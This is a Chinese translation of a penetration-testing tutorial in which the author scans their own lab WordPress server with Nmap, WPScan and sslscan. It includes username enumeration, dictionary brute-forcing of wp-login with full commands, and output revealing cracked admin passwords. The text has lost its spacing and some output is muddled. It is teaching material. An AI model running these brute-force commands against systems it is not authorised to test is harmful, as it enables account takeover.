使用KaliLinux和其他开源工具来查找系统中的安全漏洞和弱点。大量被广泛报道的大型消费企业的违规事件凸显了系统安全管理的重要性。幸运的是,有许多不同的应用程序可以帮助保护您的计算机系统。其中之一是Kali,这是一种为安全和渗透测试而开发的Linux发行版。本文演示了如何使用KaliLinux扫描您的系统以查找弱点。Kali自带了很多工具,都是开源的,默认安装它们让事情变得更简单。(LCTT译注:Kali及其自带工具只能用于自身拥有合法审查权限的系统和设备,任何未经授权的扫描、渗透和攻击都是违法的,本文作者和译者不对任何未经授权使用的结果负责.)本文使用的Kali工具系统是:kali.usersts.redhat.com:这是我将用来启动扫描和攻击的系统。它有30GB内存和6个虚拟CPU(vCPU)。vulnerable.usersys.redhat.com:这是一个将成为目标的RedHatEnterpriseLinux8系统。它有16GB内存和6个vCPU。这是一个相对较新的系统,但某些软件包可能已过时。本系统包括httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7.x86_64、mariadb-server-10.3.27-3.module+el8.3.0+8972+5e3224e9.x86_64、tigervnc-server-1.9.0-15.el8_1.x86_64、vsftpd-3.0.3-32.el8.x86_64和5.6.1版本的WordPress。我在上面列出了硬件规格,因为有些任务要求很高,尤其是在目标系统的CPU上运行WordPress安全扫描程序(WPScan)时。探测你的系统首先,我会在目标系统上运行一个基本的Nmap扫描(你可以阅读使用Nmap结果来帮助强化你的Linux系统以更深入地了解Nmap)。Nmap扫描是一种快速概览被测系统上公开了哪些端口和服务的方法。默认的Nmap扫描会显示几个您可能感兴趣的开放端口。事实上,任何开放端口都可能成为攻击者破坏您网络的一种方式。在这种情况下,端口21、22、80和443是扫描的理想候选端口,因为它们是常用服务的端口。在这个早期阶段,我只是在进行侦察,试图获得尽可能多的关于目标系统的信息。我想用Nmap监视80端口,所以我使用-p80参数查看80端口,-A参数获取操作系统和应用程序版本等信息。Nmap扫描80端口的关键信息是:PORTSTATESERVICEVERSION80/tcpopenhttpApachehttpd2.4.37((RedHatEnterpriseLinux))|_http-generator:WordPress5.6.1现在我知道这是一个WordPress服务器,I您可以使用WPScan获取有关潜在威胁的信息。进行侦察的一个好方法是尝试查找一些用户名,使用--enumerateu告诉WPScan在WordPress实例中查找用户名。例如:┌──(root💀kali)-[~]└──#wpscan--urlvulnerable.usersys.redhat.com--enumerateu_________________________________________________________________________\\//__\/____|\\/\//||__)|(____________?\\/\//|___/\___\/__|/_`|'_\\/\/||____)|(__|(_|||||\/\/|_||_____/\___|\__,_|_||_|由Automattic赞助的WPScan团队版本3.8.10的WordPress安全扫描程序-https://automattic.com/@_WPScan_,@ethicalhack3r,@erwan_lr,@firefart_____________________________________________________________[+]URL:http://vulnerable.usersys.redhat.com/[10.19.47.242][+]开始时间:2月16日星期二21:38:492021InterestingFinding(s):...[i]User(s)Identified:[+]admin|FoundBy:AuthorPosts-DisplayName(PassiveDetection)|ConfirmedBy:|AuthorIdBrute强制-作者模式(积极检测)|登录错误消息(积极检测)[+]发现者:作者帖子-显示名称(被动检测)|确认人:|作者ID暴力破解-作者模式(攻击性检测)|登录错误消息(积极检测)这表明有两个用户:admin和pgervase我将尝试使用密码字典猜测admin的密码。密码字典是包含许多密码的文本文件。我正在使用的词典大小为37G,有3,543,076,137行。正如您可以选择不同的文本编辑器、Web浏览器和其他应用程序一样,有许多工具可用于发起密码??攻击。以下是使用Nmap和WPScan的两个示例命令:#nmap-sV--scripthttp-wordpress-brute--script-argsuserdb=users.txt,passdb=/path/to/passworddb,threads=6vulnerable.usersys.redhat.com#wpscan--urlvulnerable.usersys.redhat.com--passwords/path/to/passworddb--usernamesadmin--max-threads50|teenmap.txt这个Nmap脚本是我使用的许多脚本之一,使用WPScan扫描URL只是这个工具可以做的许多事情之一。你可以使用你喜欢的那个。WPScan示例在文件末尾显示密码:┌──(root💀kali)-[~]└──#wpscan--urlvulnerable.usersys.redhat.com--passwordspasswords.txt--usernames管理员__________________________________________________________________________________________________________\\//__\/____|\\/\//||__)|(____________?\\/\//|___/\___\/__|/_`|'_\\/\/||____)|(__|(_|||||\/\/|_||_____/\___|\__,_|_||_|由Automattic赞助的WPScan团队版本3.8.10的WordPress安全扫描程序-https://automattic.com/@_WPScan_,@ethicalhack3r,@erwan_lr,@firefart_______________________________________________________________[+]URL:http://vulnerable.usersys.redhat.com/[10.19.47.242][+]开始时间:2020年2月18日星期四:32:132021InterestingFinding(s):...[+]对WpLogin执行针对1个用户的密码攻击/sTryingadmin/red帽子时间:00:01:57<================================================================================================================>(3231/3231)100.00%时间:00:01:57尝试管理员/redhat时间:00:01:57<=======================================================>(3231/6462)50.00%ETA:??:??:??[SUCCESS]-admin/redhat[!]找到有效组合:|用户名:admin,密码:redhat[!]未提供WPVulnDBAPI令牌,因此尚未输出漏洞数据。[!]您可以通过在https://wpscan.com上注册获得每日请求50次的免费API令牌/register[+]完成时间:2021年2月18日星期四20:34:15[+]完成请求:3255[+]缓存请求:34[+]发送数据:1.066MB[+]接收数据:24.513MB[+]内存使用:264.023MB[+]经过时间:00:02:02最后的“找到有效组合”部分包含管理员用户名和密码,第3231行只用了两分钟我有另一个字典文件,其中包含3,238,659,984好的,使用它需要更长的时间并留下更多的证据。使用Nmap可以更快地生成结果:┌──(root💀kali)-[~]└──#nmap-sV--scripthttp-wordpress-brute--script-argsuserdb=users.txt,passdb=password.txt,threads=6vulnerable.usersys.redhat.com在2021-02-1820:48启动Nmap7.91(https://nmap.org)ESTNmap扫描报告vulnerable.usersys.redhat.com(10.19.47.242)主机启动(0.00015秒延迟)。未显示:995个关闭端口端口状态服务版本21/tcp打开ftpvsftpd3.0.322/tcp打开sshOpenSSH8.0(协议2.0)80/tcp打开httpApachehttpd2.4.37((RedHat企业Linux))|_http-server-header:Apache/2.4.37(RedHatEnterpriseLinux)|http-wordpress-brute:|帐户:|admin:redhat-有效凭证<<<<<<<|pgervase:redhat-有效凭据<<<<<<<|_统计数据:在1秒内进行了6次猜测,平均tps:6.0111/tcp打开rpcbind2-4(RPC#100000)|rpc信息:|程序版本端口/proto服务|1000002,3,4111/TCPrpcbind|1000002,3,4111/udprpcbind|1000003,4111/tcp6rpcbind|_1000003,4111/udp6rpcbind3306/tcp5MySQL5.5-10.3.27-MariaDBMAC地址:52:54:00:8C:A1:C0(QEMU虚拟网卡)服务信息:操作系统:执行UnixService检测。请在https://nmap.org/submit/报告任何不正确的结果。Nmap完成:在7.68秒内扫描了1个IP地址(1个主机启动)但是,运行这样的扫描可能会在目标系统上留下大量HTTPD日志消息:10.19.47.170--[18/Feb/2021:20:14:01-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3.8.10(https://wpscan.org/)"10.19.47.170--[18/Feb/2021:20:14:00-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3。8.10(https://wpscan.org/)"10.19.47.170--[18/Feb/2021:20:14:00-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3.8.10(https://wpscan.org/)"10.19.47.170--[18/Feb/2021:20:14:00-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3.8.10(https://wpscan.org/)"10.19.47.170--[18/Feb/2021:20:14:00-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3.8.10(https://wpscan.org/)"10.19.47.170--[18/Feb/2021:20:14:00-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3.8.10(https://wpscan.org/)"10.19.47.170--[18/Feb/2021:20:14:02-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3.8.10(https://wpscan.org/)"10.19.47.170--[18/Feb/2021:20:14:02-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3.8.10(https://wpscan.org/)"10.19.47.170--[18/Feb/2021:20:14:02-0500]"POST/wp-login.phpHTTP/1.1"2007575"http://vulnerable.usersys.redhat.com/""WPScanv3.8.10(https://wpscan.org/)"为了获得informationabout在初始Nmap扫描中发现的关于HTTPS服务器的信息,我使用了sslscan命令:┌──(root💀kali)-[~]└──#sslscanvulnerable.usersys.redhat.comVersion:2.0.6-staticOpenSSL1.1.1i-devxxXXXxxxx连接到10.19.47.242使用SNI名称vulnerable.usersys.redhat.com在端口443上测试SSL服务器vulnerable.usersys.redhat.comSSL/TLS协议:SSLv2disabledSSLv3disabledTLSv1.0disabledTLSv1.1disabledTLSv1。2enabledTLSv1.3enabled
